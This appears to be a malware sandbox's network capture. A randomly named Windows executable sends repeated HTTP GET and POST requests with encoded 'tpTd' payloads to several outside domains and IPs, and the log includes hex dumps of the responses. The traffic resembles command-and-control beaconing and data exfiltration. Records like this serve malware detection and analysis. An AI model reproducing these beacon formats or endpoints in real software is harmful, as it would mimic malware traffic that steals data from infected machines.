Oct 8, 2024 15:35:12.827085972 CEST | 448 | IN | Data Raw: 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22
Data Ascii: stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="
Oct 8, 2024 15:35:12.827245951 CEST | 1236 | IN | Data Raw: 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22
Data Ascii: " cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.5
Oct 8, 2024 15:35:12.827416897 CEST | 1236 | IN | Data Raw: 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33
Data Ascii: ,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round
Oct 8, 2024 15:35:12.832540035 CEST | 1236 | IN | Data Raw: 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34
Data Ascii: 7,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 60839 | 199.192.19.19 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:35:14.689215899 CEST | 472 | OUT | GET /azuc/?WX=rnWllP5PLlhLLtj&tpTd=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRzC5BhxJ3N2wZ76F+LQzPhJ8EwwRHzQ== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.demovix.xyz
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:35:15.288995981 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 13:35:15 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 16026
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Oct 8, 2024 15:35:15.289017916 CEST | 1236 | IN | Data Raw: 31 2d 34 2e 36 36 38 2c 38 2e 34 32 31 2d 39 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e
Data Ascii: 1-4.668,8.421-9.196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087
Oct 8, 2024 15:35:15.289030075 CEST | 1236 | IN | Data Raw: 38 35 2d 35 2e 35 35 35 2c 31 34 31 2e 30 38 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
Data Ascii: 85-5.555,141.085-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,12
Oct 8, 2024 15:35:15.289057016 CEST | 1236 | IN | Data Raw: 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22
Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <li
Oct 8, 2024 15:35:15.289068937 CEST | 896 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20
Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
Oct 8, 2024 15:35:15.289079905 CEST | 1236 | IN | Data Raw: 3d 22 32 33 35 2e 33 38 37 22 20 79 32 3d 22 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: ="235.387" y2="295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032"
Oct 8, 2024 15:35:15.289093018 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
Data Ascii: x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-mite
Oct 8, 2024 15:35:15.289103985 CEST | 448 | IN | Data Raw: 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78
Data Ascii: troke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
Oct 8, 2024 15:35:15.289494038 CEST | 1236 | IN | Data Raw: 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c
Data Ascii: e fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E
Oct 8, 2024 15:35:15.289736032 CEST | 1236 | IN | Data Raw: 33 2d 31 39 2e 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43
Data Ascii: 3-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke
Oct 8, 2024 15:35:15.294135094 CEST | 1236 | IN | Data Raw: 2e 38 32 39 2c 31 37 2e 33 33 2d 35 2e 37 36 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35
Data Ascii: .829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" s


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              25192.168.2.960840208.91.197.27801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.766876936 CEST749OUTPOST /bnrz/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.palcoconnector.net
                                                                                                                                                                                                              Origin: http://www.palcoconnector.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.palcoconnector.net/bnrz/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=DSZQwtuPtL5jRLoHDpAQLroioxvPhpA9aK4Hj15QQJnQJFw21zJQ3dNbaK2jpW9z6EQ61015jRpXwzq4iNstjPAWmfJGiA+l+3Ky9UGbF+lq/IewkHneZPnA1a7ZxNk18cQBsGNEIEmHvw2U6a7iTN4xrDD1WQ25lo5MFY/s8FOaH/Ac4fyASxH/e5A4


Session ID: 26 | Source IP: 192.168.2.9 | Source Port: 60841 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp: Oct 8, 2024 15:35:23.320000887 CEST | Bytes transferred: 773 | Direction: OUT | Data:
POST /bnrz/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.palcoconnector.net
Origin: http://www.palcoconnector.net
Cache-Control: max-age=0
Content-Length: 217
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.palcoconnector.net/bnrz/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=DSZQwtuPtL5jSr4HFOUQcbohnRvP0ZA5aK8HjwYNQ6DQJkA203dQ0dNbP62mx2946EcE1wx5jRVXw2W4i/Ei5/AUr/JEsg+l+3Ky9USxF+9q89WwkmndQvnB2a7Z1NkL8cRxsCVuIB6HvxmU6Ov9dN43mjC6Rie0jbp4bqzvsG+lN+gCpt7bHmHYZeJQZqrZZaTh+SPoDhNRu17pqg==


Session ID: 27 | Source IP: 192.168.2.9 | Source Port: 60842 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp: Oct 8, 2024 15:35:25.867177963 CEST | Bytes transferred: 1786 | Direction: OUT | Data:
POST /bnrz/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.palcoconnector.net
Origin: http://www.palcoconnector.net
Cache-Control: max-age=0
Content-Length: 1229
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.palcoconnector.net/bnrz/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=… [TRUNCATED]


Session ID: 28 | Source IP: 192.168.2.9 | Source Port: 60843 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp: Oct 8, 2024 15:35:28.410914898 CEST | Bytes transferred: 479 | Direction: OUT | Data:
GET /bnrz/?tpTd=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq48p+wh68NaozaF8Wex7USlPt5ZhMWe3g==&WX=rnWllP5PLlhLLtj HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.palcoconnector.net
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Timestamp: Oct 8, 2024 15:35:29.515738964 CEST | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:35:28 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
Set-Cookie: vsid=908vr47594012900756934; expires=Sun, 07-Oct-2029 13:35:29 GMT; Max-Age=157680000; path=/; domain=www.palcoconnector.net; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_eeOY20v5H5Oq/uqAcmU3jU1VXFZVeIlL7RScKo7CsXQgAYiRiYpYfV0QsvrldM8t5IEa6SxtbsI3NQ9r0dxpXg==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Connection: close
Data Ascii: a172<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net
Timestamp: Oct 8, 2024 15:35:29.515763044 CEST | Bytes transferred: 1236 | Direction: IN
Data Ascii: "> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in
Timestamp: Oct 8, 2024 15:35:29.515779018 CEST | Bytes transferred: 1236 | Direction: IN
Data Ascii: ion(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="language
Timestamp: Oct 8, 2024 15:35:29.515791893 CEST | Bytes transferred: 1236 | Direction: IN
Data Ascii: uages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.
Timestamp: Oct 8, 2024 15:35:29.515803099 CEST | Bytes transferred: 896 | Direction: IN
Data Ascii: h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else
Timestamp: Oct 8, 2024 15:35:29.515814066 CEST | Bytes transferred: 1236 | Direction: IN
Data Ascii: t){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("hea
Timestamp: Oct 8, 2024 15:35:29.515825033 CEST | Bytes transferred: 1236 | Direction: IN
Data Ascii: ngth){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({v
Timestamp: Oct 8, 2024 15:35:29.515837908 CEST | Bytes transferred: 1236 | Direction: IN
Data Ascii: for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,sectio
Timestamp: Oct 8, 2024 15:35:29.516009092 CEST | Bytes transferred: 1236 | Direction: IN
Data Ascii: tMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?
Timestamp: Oct 8, 2024 15:35:29.516020060 CEST | Bytes transferred: 235 | Direction: IN
Data Ascii: cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}
Timestamp: Oct 8, 2024 15:35:29.521941900 CEST | Bytes transferred: 1236 | Direction: IN
Data Ascii: if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.palcoconnector.net/px.js?ch=1"></script><script t


Session ID: 29 | Source IP: 192.168.2.9 | Source Port: 60844 | Destination IP: 156.242.132.82 | Destination Port: 80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp: Oct 8, 2024 15:35:35.399240017 CEST | Bytes transferred: 740 | Direction: OUT | Data:
POST /b6g5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.shanhaiguan.net
Origin: http://www.shanhaiguan.net
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.shanhaiguan.net/b6g5/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 58 2b 34 4b 50 56 34 76 6a 79 46 4e 38 52 72 6b 52 69 70 76 4f 36 47 33 42 49 6b 6e 57 66 54 36 36 61 37 78 6c 42 61 61 76 35 43 41 45 6a 7a 4f 79 43 69 76 36 46 64 57 77 65 2f 30 6c 2f 57 4f 32 57 33 44 45 48 68 73 76 7a 41 79 36 4d 46 67 4b 7a 6e 32 76 43 52 72 6d 68 66 50 6a 63 46 44 78 55 6a 41 49 35 32 69 56 6c 32 33 6c 53 78 47 55 75 31 4e 68 53 71 39 56 5a 6a 46 73 6a 56 6f 2f 6a 48 41 71 6c 56 6d 44 59 76 37 4c 30 76 66 5a 78 6d 67 70 35 6a 4f 62 67 4b 79 56 30 39 4b 69 30 59 2b 47 30 59 70 43 39 36 6d 75 66 4b 4e 4b 6c 64 73 51 33 48 71 71 72 77 61
                                                                                                                                                                                                              Data Ascii: tpTd=X+4KPV4vjyFN8RrkRipvO6G3BIknWfT66a7xlBaav5CAEjzOyCiv6FdWwe/0l/WO2W3DEHhsvzAy6MFgKzn2vCRrmhfPjcFDxUjAI52iVl23lSxGUu1NhSq9VZjFsjVo/jHAqlVmDYv7L0vfZxmgp5jObgKyV09Ki0Y+G0YpC96mufKNKldsQ3Hqqrwa


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.9  60845        156.242.132.82  80                1432  C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:35:37.943063021 CEST  764                OUT        POST /b6g5/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.shanhaiguan.net
    Origin: http://www.shanhaiguan.net
    Cache-Control: max-age=0
    Content-Length: 217
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.shanhaiguan.net/b6g5/
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
    Data Raw: 74 70 54 64 3d 58 2b 34 4b 50 56 34 76 6a 79 46 4e 38 78 62 6b 54 42 42 76 66 61 47 30 45 49 6b 6e 64 2f 54 2b 36 61 33 78 6c 41 75 77 76 4c 6d 41 45 44 44 4f 67 32 57 76 33 6c 64 57 34 2b 2f 39 34 50 57 52 32 57 72 4c 45 48 64 73 76 7a 55 79 36 4a 35 67 4a 45 4c 31 74 53 52 70 70 42 66 4e 73 38 46 44 78 55 6a 41 49 35 6a 4a 56 6c 75 33 69 6d 31 47 55 4c 42 43 2b 69 71 2b 53 5a 6a 46 6f 6a 56 73 2f 6a 48 75 71 6c 6c 4d 44 65 6a 37 4c 78 44 66 61 67 6d 6a 6e 35 6a 49 45 77 4c 77 46 6d 39 46 72 6d 30 61 4a 31 51 63 51 37 69 4f 74 2b 71 54 62 58 55 33 46 67 48 4e 74 4d 35 79 56 61 4c 59 52 6a 38 30 6f 32 6e 2f 51 4c 43 42 31 37 36 72 49 51 3d 3d
    Data Ascii: tpTd=X+4KPV4vjyFN8xbkTBBvfaG0EIknd/T+6a3xlAuwvLmAEDDOg2Wv3ldW4+/94PWR2WrLEHdsvzUy6J5gJEL1tSRppBfNs8FDxUjAI5jJVlu3im1GULBC+iq+SZjFojVs/jHuqllMDej7LxDfagmjn5jIEwLwFm9Frm0aJ1QcQ7iOt+qTbXU3FgHNtM5yVaLYRj80o2n/QLCB176rIQ==


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
31          192.168.2.9  60846        156.242.132.82  80                1432  C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:35:40.489506006 CEST  1777               OUT        POST /b6g5/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.shanhaiguan.net
    Origin: http://www.shanhaiguan.net
    Cache-Control: max-age=0
    Content-Length: 1229
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.shanhaiguan.net/b6g5/
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
